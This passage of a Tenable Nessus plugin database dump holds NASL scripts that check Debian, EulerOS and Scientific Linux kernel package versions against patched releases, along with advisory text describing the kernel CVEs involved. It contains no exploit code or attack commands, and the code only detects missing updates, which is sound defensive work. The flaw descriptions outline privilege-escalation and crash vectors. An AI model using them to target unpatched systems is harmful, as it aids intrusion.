(deb_check(release:\"6.0\", prefix:\"firmware-linux-free\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-base\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-doc-2.6.32\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-486\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-686\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-686-bigmem\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-all\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-all-amd64\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-all-i386\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-amd64\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-common\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-common-openvz\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-common-vserver\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-common-xen\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-openvz-686\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-openvz-amd64\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-vserver-686\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-vserver-686-bigmem\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-vserver-amd64\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-xen-686\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-headers-2.6.32-5-xen-amd64\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-486\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-686\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-686-bigmem\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-686-bigmem-dbg\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-amd64\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-amd64-dbg\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-openvz-686\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-openvz-686-dbg\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-openvz-amd64\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-openvz-amd64-dbg\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-686\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-686-bigmem\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-686-bigmem-dbg\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-amd64\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-vserver-amd64-dbg\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-xen-686\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-xen-686-dbg\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-xen-amd64\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-image-2.6.32-5-xen-amd64-dbg\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-libc-dev\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-manual-2.6.32\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-patch-debian-2.6.32\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-source-2.6.32\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-support-2.6.32-5\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"linux-tools-2.6.32\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xen-linux-system-2.6.32-5-xen-686\", reference:\"2.6.32-48squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xen-linux-system-2.6.32-5-xen-amd64\", reference:\"2.6.32-48squeeze11\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-10T08:57:12", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerabilities :\n\n - A flaw was found in the way the Linux kernel's Crypto\n subsystem handled automatic loading of kernel modules.\n A local user could use this flaw to load any installed\n kernel module, and thus increase the attack surface of\n the running kernel.(CVE-2014-9644)\n\n - The Btrfs implementation in the Linux kernel before\n 3.19 does not ensure that the visible xattr state is\n consistent with a requested replacement, which allows\n local users to bypass intended ACL settings and gain\n privileges via standard filesystem operations (1)\n during an xattr-replacement time window, related to a\n race condition, or (2) after an xattr-replacement\n attempt that fails because the data does not\n fit.(CVE-2014-9710)\n\n - An integer overflow flaw was found in the way the Linux\n kernel's netfilter connection tracking implementation\n loaded extensions. An attacker on a local network could\n potentially send a sequence of specially crafted\n packets that would initiate the loading of a large\n number of extensions, causing the targeted system in\n that network to crash.(CVE-2014-9715)\n\n - A symlink size validation was missing in Linux kernels\n built with UDF file system (CONFIG_UDF_FS) support,\n allowing the corruption of kernel memory. An attacker\n able to mount a corrupted/malicious UDF file system\n image could cause the kernel to crash.(CVE-2014-9728)\n\n - A symlink size validation was missing in Linux kernels\n built with UDF file system (CONFIG_UDF_FS) support,\n allowing the corruption of kernel memory. An attacker\n able to mount a corrupted/malicious UDF file system\n image could cause the kernel to crash.(CVE-2014-9729)\n\n - A symlink size validation was missing in Linux kernels\n built with UDF file system (CONFIG_UDF_FS) support,\n allowing the corruption of kernel memory. An attacker\n able to mount a corrupted/malicious UDF file system\n image could cause the kernel to crash.(CVE-2014-9730)\n\n - A path length checking flaw was found in Linux kernels\n built with UDF file system (CONFIG_UDF_FS) support. An\n attacker able to mount a corrupted/malicious UDF file\n system image could use this flaw to leak kernel memory\n to user-space.(CVE-2014-9731)\n\n - The snd_compr_tstamp function in\n sound/core/compress_offload.c in the Linux kernel\n through 4.7, as used in Android before 2016-08-05 on\n Nexus 5 and 7 (2013) devices, does not properly\n initialize a timestamp data structure, which allows\n attackers to obtain sensitive information via a crafted\n application, aka Android internal bug 28770164 and\n Qualcomm internal bug CR568717.(CVE-2014-9892)\n\n - drivers/media/media-device.c in the Linux kernel before\n 3.11, as used in Android before 2016-08-05 on Nexus 5\n and 7 (2013) devices, does not properly initialize\n certain data structures, which allows local users to\n obtain sensitive information via a crafted application,\n aka Android internal bug 28750150 and Qualcomm internal\n bug CR570757, a different vulnerability than\n CVE-2014-1739.(CVE-2014-9895)\n\n - The ethtool_get_wol function in net/core/ethtool.c in\n the Linux kernel through 4.7, as used in Android before\n 2016-08-05 on Nexus 5 and 7 (2013) devices, does not\n initialize a certain data structure, which allows local\n users to obtain sensitive information via a crafted\n application, aka Android internal bug 28803952 and\n Qualcomm internal bug CR570754.(CVE-2014-9900)\n\n - The snd_compress_check_input function in\n sound/core/compress_offload.c in the ALSA subsystem in\n the Linux kernel before 3.17 does not properly check\n for an integer overflow, which allows local users to\n cause a denial of service (insufficient memory\n allocation) or possibly have unspecified other impact\n via a crafted SNDRV_COMPRESS_SET_PARAMS ioctl\n call.(CVE-2014-9904)\n\n - A race condition in the ip4_datagram_release_cb\n function in net/ipv4/datagram.c in the Linux kernel\n allows local users to gain privileges or cause a denial\n of service (use-after-free) by leveraging incorrect\n expectations about locking during multithreaded access\n to internal data structures for IPv4 UDP\n sockets.(CVE-2014-9914)\n\n - A flaw was discovered in the way the kernel allows\n stackable filesystems to overlay. A local attacker who\n is able to mount filesystems can abuse this flaw to\n escalate privileges.(CVE-2014-9922)\n\n - The regulator_ena_gpio_free function in\n drivers/regulator/core.c in the Linux kernel allows\n local users to gain privileges or cause a denial of\n service (use-after-free) via a crafted\n application.(CVE-2014-9940)\n\n - It was found that the Linux kernel KVM subsystem's\n sysenter instruction emulation was not sufficient. An\n unprivileged guest user could use this flaw to escalate\n their privileges by tricking the hypervisor to emulate\n a SYSENTER instruction in 16-bit mode, if the guest OS\n did not initialize the SYSENTER model-specific\n registers (MSRs). Note: Certified guest operating\n systems for Red Hat Enterprise Linux with KVM do\n initialize the SYSENTER MSRs and are thus not\n vulnerable to this issue when running on a KVM\n hypervisor.(CVE-2015-0239)\n\n - A flaw was found in the way the Linux kernel's XFS file\n system handled replacing of remote attributes under\n certain conditions. A local user with access to XFS\n file system mount could potentially use this flaw to\n escalate their privileges on the system.(CVE-2015-0274)\n\n - A flaw was found in the way the Linux kernel's ext4\n file system handled the 'page size i1/4z block size'\n condition when the fallocate zero range functionality\n was used. A local attacker could use this flaw to crash\n the system.(CVE-2015-0275)\n\n - It was found that the Linux kernel's keyring\n implementation would leak memory when adding a key to a\n keyring via the add_key() function. A local attacker\n could use this flaw to exhaust all available memory on\n the system.(CVE-2015-1333)\n\n - Race condition in the handle_to_path function in\n fs/fhandle.c in the Linux kernel through 3.19.1 allows\n local users to bypass intended size restrictions and\n trigger read operations on additional memory locations\n by changing the handle_bytes value of a file handle\n during the execution of this function.(CVE-2015-1420)\n\n - A use-after-free flaw was found in the way the Linux\n kernel's SCTP implementation handled authentication key\n reference counting during INIT collisions. A remote\n attacker could use this flaw to crash the system or,\n potentially, escalate their privileges on the\n system.(CVE-2015-1421)\n\n - The IPv4 implementation in the Linux kernel before\n 3.18.8 does not properly consider the length of the\n Read-Copy Update (RCU) grace period for redirecting\n lookups in the absence of caching, which allows remote\n attackers to cause a denial of service (memory\n consumption or system crash) via a flood of\n packets.(CVE-2015-1465)\n\n - A flaw was found in the way the nft_flush_table()\n function of the Linux kernel's netfilter tables\n implementation flushed rules that were referencing\n deleted chains. A local user who has the CAP_NET_ADMIN\n capability could use this flaw to crash the\n system.(CVE-2015-1573)\n\n - An integer overflow flaw was found in the way the Linux\n kernel randomized the stack for processes on certain\n 64-bit architecture systems, such as x86-64, causing\n the stack entropy to be reduced by four.(CVE-2015-1593)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-13T00:00:00", "title": "EulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1485)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9644", "CVE-2014-9715", "CVE-2015-1420", "CVE-2015-1593", "CVE-2014-1739", "CVE-2014-9940", "CVE-2015-0274", "CVE-2014-9728", "CVE-2015-1421", "CVE-2015-1465", "CVE-2014-9730", "CVE-2014-9904", "CVE-2014-9900", "CVE-2014-9895", "CVE-2014-9914", "CVE-2014-9922", "CVE-2015-0239", "CVE-2014-9729", "CVE-2015-1333", "CVE-2015-0275", "CVE-2015-1573", "CVE-2014-9710", "CVE-2014-9731", "CVE-2014-9892"], "modified": "2019-05-13T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-devel", "cpe:/o:huawei:euleros:uvp:3.0.1.0", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs"], "id": "EULEROS_SA-2019-1485.NASL", "href": "https://www.tenable.com/plugins/nessus/124809", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124809);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/09\");\n\n script_cve_id(\n \"CVE-2014-9644\",\n \"CVE-2014-9710\",\n \"CVE-2014-9715\",\n \"CVE-2014-9728\",\n \"CVE-2014-9729\",\n \"CVE-2014-9730\",\n \"CVE-2014-9731\",\n \"CVE-2014-9892\",\n \"CVE-2014-9895\",\n \"CVE-2014-9900\",\n \"CVE-2014-9904\",\n \"CVE-2014-9914\",\n \"CVE-2014-9922\",\n \"CVE-2014-9940\",\n \"CVE-2015-0239\",\n \"CVE-2015-0274\",\n \"CVE-2015-0275\",\n \"CVE-2015-1333\",\n \"CVE-2015-1420\",\n \"CVE-2015-1421\",\n \"CVE-2015-1465\",\n \"CVE-2015-1573\",\n \"CVE-2015-1593\"\n );\n script_bugtraq_id(\n 72320,\n 72356,\n 72357,\n 72435,\n 72552,\n 72607,\n 72842,\n 73156,\n 73308,\n 73953,\n 74964,\n 75001,\n 75139\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1485)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerabilities :\n\n - A flaw was found in the way the Linux kernel's Crypto\n subsystem handled automatic loading of kernel modules.\n A local user could use this flaw to load any installed\n kernel module, and thus increase the attack surface of\n the running kernel.(CVE-2014-9644)\n\n - The Btrfs implementation in the Linux kernel before\n 3.19 does not ensure that the visible xattr state is\n consistent with a requested replacement, which allows\n local users to bypass intended ACL settings and gain\n privileges via standard filesystem operations (1)\n during an xattr-replacement time window, related to a\n race condition, or (2) after an xattr-replacement\n attempt that fails because the data does not\n fit.(CVE-2014-9710)\n\n - An integer overflow flaw was found in the way the Linux\n kernel's netfilter connection tracking implementation\n loaded extensions. An attacker on a local network could\n potentially send a sequence of specially crafted\n packets that would initiate the loading of a large\n number of extensions, causing the targeted system in\n that network to crash.(CVE-2014-9715)\n\n - A symlink size validation was missing in Linux kernels\n built with UDF file system (CONFIG_UDF_FS) support,\n allowing the corruption of kernel memory. An attacker\n able to mount a corrupted/malicious UDF file system\n image could cause the kernel to crash.(CVE-2014-9728)\n\n - A symlink size validation was missing in Linux kernels\n built with UDF file system (CONFIG_UDF_FS) support,\n allowing the corruption of kernel memory. An attacker\n able to mount a corrupted/malicious UDF file system\n image could cause the kernel to crash.(CVE-2014-9729)\n\n - A symlink size validation was missing in Linux kernels\n built with UDF file system (CONFIG_UDF_FS) support,\n allowing the corruption of kernel memory. An attacker\n able to mount a corrupted/malicious UDF file system\n image could cause the kernel to crash.(CVE-2014-9730)\n\n - A path length checking flaw was found in Linux kernels\n built with UDF file system (CONFIG_UDF_FS) support. An\n attacker able to mount a corrupted/malicious UDF file\n system image could use this flaw to leak kernel memory\n to user-space.(CVE-2014-9731)\n\n - The snd_compr_tstamp function in\n sound/core/compress_offload.c in the Linux kernel\n through 4.7, as used in Android before 2016-08-05 on\n Nexus 5 and 7 (2013) devices, does not properly\n initialize a timestamp data structure, which allows\n attackers to obtain sensitive information via a crafted\n application, aka Android internal bug 28770164 and\n Qualcomm internal bug CR568717.(CVE-2014-9892)\n\n - drivers/media/media-device.c in the Linux kernel before\n 3.11, as used in Android before 2016-08-05 on Nexus 5\n and 7 (2013) devices, does not properly initialize\n certain data structures, which allows local users to\n obtain sensitive information via a crafted application,\n aka Android internal bug 28750150 and Qualcomm internal\n bug CR570757, a different vulnerability than\n CVE-2014-1739.(CVE-2014-9895)\n\n - The ethtool_get_wol function in net/core/ethtool.c in\n the Linux kernel through 4.7, as used in Android before\n 2016-08-05 on Nexus 5 and 7 (2013) devices, does not\n initialize a certain data structure, which allows local\n users to obtain sensitive information via a crafted\n application, aka Android internal bug 28803952 and\n Qualcomm internal bug CR570754.(CVE-2014-9900)\n\n - The snd_compress_check_input function in\n sound/core/compress_offload.c in the ALSA subsystem in\n the Linux kernel before 3.17 does not properly check\n for an integer overflow, which allows local users to\n cause a denial of service (insufficient memory\n allocation) or possibly have unspecified other impact\n via a crafted SNDRV_COMPRESS_SET_PARAMS ioctl\n call.(CVE-2014-9904)\n\n - A race condition in the ip4_datagram_release_cb\n function in net/ipv4/datagram.c in the Linux kernel\n allows local users to gain privileges or cause a denial\n of service (use-after-free) by leveraging incorrect\n expectations about locking during multithreaded access\n to internal data structures for IPv4 UDP\n sockets.(CVE-2014-9914)\n\n - A flaw was discovered in the way the kernel allows\n stackable filesystems to overlay. A local attacker who\n is able to mount filesystems can abuse this flaw to\n escalate privileges.(CVE-2014-9922)\n\n - The regulator_ena_gpio_free function in\n drivers/regulator/core.c in the Linux kernel allows\n local users to gain privileges or cause a denial of\n service (use-after-free) via a crafted\n application.(CVE-2014-9940)\n\n - It was found that the Linux kernel KVM subsystem's\n sysenter instruction emulation was not sufficient. An\n unprivileged guest user could use this flaw to escalate\n their privileges by tricking the hypervisor to emulate\n a SYSENTER instruction in 16-bit mode, if the guest OS\n did not initialize the SYSENTER model-specific\n registers (MSRs). Note: Certified guest operating\n systems for Red Hat Enterprise Linux with KVM do\n initialize the SYSENTER MSRs and are thus not\n vulnerable to this issue when running on a KVM\n hypervisor.(CVE-2015-0239)\n\n - A flaw was found in the way the Linux kernel's XFS file\n system handled replacing of remote attributes under\n certain conditions. A local user with access to XFS\n file system mount could potentially use this flaw to\n escalate their privileges on the system.(CVE-2015-0274)\n\n - A flaw was found in the way the Linux kernel's ext4\n file system handled the 'page size i1/4z block size'\n condition when the fallocate zero range functionality\n was used. A local attacker could use this flaw to crash\n the system.(CVE-2015-0275)\n\n - It was found that the Linux kernel's keyring\n implementation would leak memory when adding a key to a\n keyring via the add_key() function. A local attacker\n could use this flaw to exhaust all available memory on\n the system.(CVE-2015-1333)\n\n - Race condition in the handle_to_path function in\n fs/fhandle.c in the Linux kernel through 3.19.1 allows\n local users to bypass intended size restrictions and\n trigger read operations on additional memory locations\n by changing the handle_bytes value of a file handle\n during the execution of this function.(CVE-2015-1420)\n\n - A use-after-free flaw was found in the way the Linux\n kernel's SCTP implementation handled authentication key\n reference counting during INIT collisions. A remote\n attacker could use this flaw to crash the system or,\n potentially, escalate their privileges on the\n system.(CVE-2015-1421)\n\n - The IPv4 implementation in the Linux kernel before\n 3.18.8 does not properly consider the length of the\n Read-Copy Update (RCU) grace period for redirecting\n lookups in the absence of caching, which allows remote\n attackers to cause a denial of service (memory\n consumption or system crash) via a flood of\n packets.(CVE-2015-1465)\n\n - A flaw was found in the way the nft_flush_table()\n function of the Linux kernel's netfilter tables\n implementation flushed rules that were referencing\n deleted chains. A local user who has the CAP_NET_ADMIN\n capability could use this flaw to crash the\n system.(CVE-2015-1573)\n\n - An integer overflow flaw was found in the way the Linux\n kernel randomized the stack for processes on certain\n 64-bit architecture systems, such as x86-64, causing\n the stack entropy to be reduced by four.(CVE-2015-1593)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1485\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56c41fa7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-862.14.1.6_42\",\n \"kernel-devel-3.10.0-862.14.1.6_42\",\n \"kernel-headers-3.10.0-862.14.1.6_42\",\n \"kernel-tools-3.10.0-862.14.1.6_42\",\n \"kernel-tools-libs-3.10.0-862.14.1.6_42\",\n \"kernel-tools-libs-devel-3.10.0-862.14.1.6_42\",\n \"perf-3.10.0-862.14.1.6_42\",\n \"python-perf-3.10.0-862.14.1.6_42\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:48:39", "description": " - A flaw was found in the way the Linux kernel's splice()\n system call validated its parameters. On certain file\n systems, a local, unprivileged user could use this flaw\n to write past the maximum file size, and thus crash the\n system. (CVE-2014-7822, Moderate)\n\nThis update also fixes the following bugs :\n\n - Previously, hot-unplugging of a virtio-blk device could\n in some cases lead to a kernel panic, for example during\n in-flight I/O requests. This update fixes race condition\n in the hot-unplug code in the virtio_blk.ko module. As a\n result, hot unplugging of the virtio-blk device no\n longer causes the guest kernel oops when there are\n in-flight I/O requests.\n\n - Before this update, due to a bug in the error-handling\n path, a corrupted metadata block could be used as a\n valid block. With this update, the error handling path\n has been fixed and more checks have been added to verify\n the metadata block. Now, when a corrupted metadata block\n is encountered, it is properly marked as corrupted and\n handled accordingly.\n\n - Previously, an incorrectly initialized variable resulted\n in a random value being stored in the variable that\n holds the number of default ACLs, and is sent in the\n SET_PATH_INFO data structure. Consequently, the setfacl\n command could, under certain circumstances, fail with an\n 'Invalid argument' error. With this update, the variable\n is correctly initialized to zero, thus fixing the bug.\n\nThe system must be rebooted for this update to take effect.", "edition": 15, "published": "2015-02-12T00:00:00", "title": "Scientific Linux Security Update : kernel on SL5.x i386/x86_64 (20150210)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7822"], "modified": "2015-02-12T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel", "p-cpe:/a:fermilab:scientific_linux:kernel-PAE-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debug", "p-cpe:/a:fermilab:scientific_linux:kernel-xen-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common", "p-cpe:/a:fermilab:scientific_linux:kernel-xen-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-PAE", "p-cpe:/a:fermilab:scientific_linux:kernel-headers", "p-cpe:/a:fermilab:scientific_linux:kernel-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:kernel-doc", "p-cpe:/a:fermilab:scientific_linux:kernel-xen", "p-cpe:/a:fermilab:scientific_linux:kernel-PAE-devel"], "id": "SL_20150210_KERNEL_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/81308", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81308);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-7822\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL5.x i386/x86_64 (20150210)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - A flaw was found in the way the Linux kernel's splice()\n system call validated its parameters. On certain file\n systems, a local, unprivileged user could use this flaw\n to write past the maximum file size, and thus crash the\n system. (CVE-2014-7822, Moderate)\n\nThis update also fixes the following bugs :\n\n - Previously, hot-unplugging of a virtio-blk device could\n in some cases lead to a kernel panic, for example during\n in-flight I/O requests. This update fixes race condition\n in the hot-unplug code in the virtio_blk.ko module. As 